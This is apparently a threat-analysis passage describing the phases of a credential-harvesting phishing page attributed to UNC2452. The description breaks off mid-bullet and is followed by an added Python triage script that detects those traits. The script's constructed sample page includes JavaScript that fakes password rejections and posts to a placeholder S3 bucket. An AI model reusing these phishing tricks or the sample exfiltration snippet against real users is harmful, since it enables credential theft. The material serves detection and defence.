The phases of the malicious campaign orchestrated by UNC2452, which targets credential harvesting and establishing a foothold on endpoints, break down as follows:
Phase 1: Environment Establishment
Objective: Ensure that the victim uses Microsoft Edge for subsequent actions.
- Health Check Button Trigger: When the "Health Check" button is clicked, it triggers an environment check.
- Edge Browser Enforcement: If the user isn't already using Microsoft Edge, a modal appears prompting them to open the page in Edge. This ensures the attacker's scripts are executed in a controlled browser environment.
Phase 2: Credential Harvesting
Objective: Capture credentials through social engineering tactics.
- Authentication Required Modal: Upon clicking "Health Check," an authentication modal is displayed.
- Double Entry Trick: The script rejects the first two password attempts to reinforce legitimacy and ensure accurate credential capture.
- Default Email Field: The email field is pre-filled with a default value, making it easier for users to enter their credentials without suspicion.
Phase 3: Data Exfiltration
Objective: Upload harvested credentials and metadata to an attacker-controlled AWS S3 bucket while keeping the victim engaged through distraction sequences.
- **Asynchronous
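A defender-side triage helper that checks a captured page source for the four behaviours described in the phases above (Edge gating, rejection of the first attempts, pre-filled email field, upload to S3). This is an added example, not code from the original article or the campaign; the indicator names, the two-phase verdict threshold and both sample pages are constructed.

```python
"""Static triage of a captured login page for the credential-harvesting
traits described in the phase breakdown. Added example; indicator names,
the verdict threshold and both sample pages are constructed."""
import re

def _rx(pattern):
    rx = re.compile(pattern, re.I)
    return lambda src: rx.search(src) is not None

def _has_prefilled_email(src):
    # An <input type="email"> that carries a non-empty value, in any attribute order.
    for tag in re.findall(r"<input[^>]*>", src, re.I):
        if re.search(r'type=["\']email["\']', tag, re.I) and \
           re.search(r'value=["\'][^"\']+["\']', tag, re.I):
            return True
    return False

# indicator name -> (campaign phase it belongs to, predicate over the page source)
INDICATORS = {
    "edge_gating": (1, _rx(r"userAgent[^;\n]*Edg")),             # Phase 1
    "first_attempts_rejected": (2, _rx(r"attempt\w*\s*<\s*2")),  # Phase 2
    "prefilled_email": (2, _has_prefilled_email),                # Phase 2
    "s3_upload": (3, _rx(r"https?://[\w.-]*amazonaws\.com/")),   # Phase 3
}

def triage(page_source):
    """Return matched indicators, the phases they cover, and a verdict that
    fires when indicators from at least two phases co-occur on one page."""
    hits = sorted(n for n, (_, pred) in INDICATORS.items() if pred(page_source))
    phases = sorted({INDICATORS[h][0] for h in hits})
    return {"hits": hits, "phases": phases, "suspicious": len(phases) >= 2}

# Constructed sample pages (not captured material).
SUSPICIOUS_PAGE = """
<script>
if (!navigator.userAgent.includes("Edg")) { showEdgeModal(); }
function onSubmit() {
  if (attempts < 2) { attempts++; showError("Incorrect password"); return; }
  fetch("https://bucket-placeholder.s3.amazonaws.com/collect", {method: "POST"});
}
</script>
<input type="email" value="user@example.com"><input type="password">
"""
BENIGN_PAGE = """
<form method="post" action="/login">
  <input type="email" name="email"><input type="password" name="pw">
</form>
"""

if __name__ == "__main__":
    print(triage(SUSPICIOUS_PAGE))  # phases [1, 2, 3], suspicious True
    print(triage(BENIGN_PAGE))      # no hits, suspicious False
```

Feed it the saved HTML of a reported page; a single indicator alone (a pre-filled email field is common on legitimate sites) does not trigger the verdict, only the co-occurrence across phases does.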